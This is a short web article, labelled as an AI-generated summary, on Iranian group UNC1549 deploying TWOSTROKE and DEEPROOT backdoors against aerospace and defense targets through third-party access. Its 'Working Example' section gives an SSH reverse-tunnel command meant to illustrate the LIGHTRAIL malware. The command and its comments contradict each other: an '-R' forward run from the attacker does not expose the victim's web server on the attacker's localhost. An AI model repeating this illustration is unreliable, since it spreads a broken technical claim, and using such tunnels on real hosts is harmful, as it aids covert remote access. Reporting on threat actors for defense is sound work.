Iranian Hackers Use DEEPROOT and TWOSTROKE Malware in Aerospace and Defense Attacks
These articles are AI-generated summaries. Please check the original sources for full details.
Iranian Hackers Target Aerospace and Defense Industries
Iranian threat actor UNC1549 (aka GalaxyGato, Nimbus Manticore, or Subtle Snail) is actively deploying backdoors like TWOSTROKE and DEEPROOT against aerospace, aviation, and defense organizations in the Middle East. This activity, observed from late 2023 through 2025, highlights a sophisticated, multi-pronged approach to initial access and persistent compromise.
Why This Matters
Ideal security models assume robust defenses across all network segments, but the reality is that supply chains often present the weakest link. UNC1549’s exploitation of third-party relationships demonstrates the high cost – potentially billions in intellectual property theft and operational disruption – of failing to secure the entire ecosystem, not just the core organization.
Key Insights
- Third-party breaches: UNC1549 compromised 11 European telecom companies via LinkedIn phishing, 2024 (PRODAFT report).
- Initial Access Vectors: Leveraging trusted relationships (Citrix, VMWare, Azure VDA) provides a lower-friction path than direct attacks.
- Stealth and Persistence: Backdoors remain dormant for months to reactivate after remediation, prioritizing long-term access.
Working Example
# Example of a basic reverse SSH tunnel (similar to LIGHTRAIL's functionality)
# This is a simplified illustration and doesn't represent the full complexity of the malware.
# Attacker Machine
ssh -R 8080:localhost:80 victim_machine
# Victim Machine (compromised host)
# Now, accessing http://localhost:8080 on the attacker's machine will forward the request to the victim's web server.Practical Applications
- Use Case: Defense contractors utilizing managed service providers require continuous monitoring of third-party access and adherence to stringent security protocols.
- Pitfall: Relying solely on perimeter defenses while neglecting supply chain security creates a vulnerable attack surface for sophisticated adversaries.
References:
Continue reading
Next article
JSON: The Simple Data Format That Transformed the Modern Web
Related Content
Iranian Hackers Launch ‘SpearSpecter’ Spy Operation on Defense & Government Targets
Iran’s APT42 launched the ‘SpearSpecter’ campaign in September 2025, targeting defense and government officials with the TAMECAT malware.
North Korean PurpleBravo Campaign Targeted 3,136 IPs via Fake Job Interviews
North Korean PurpleBravo hackers targeted 3,136 IP addresses and 20 companies with malicious VS Code projects and BeaverTail malware.
Operation SkyCloak: Tor-Powered OpenSSH Backdoor Targeting Defense Sectors
Researchers reveal a sophisticated cyber campaign, Operation SkyCloak, using Tor-enabled OpenSSH backdoors to target defense networks in Russia and Belarus via phishing attacks.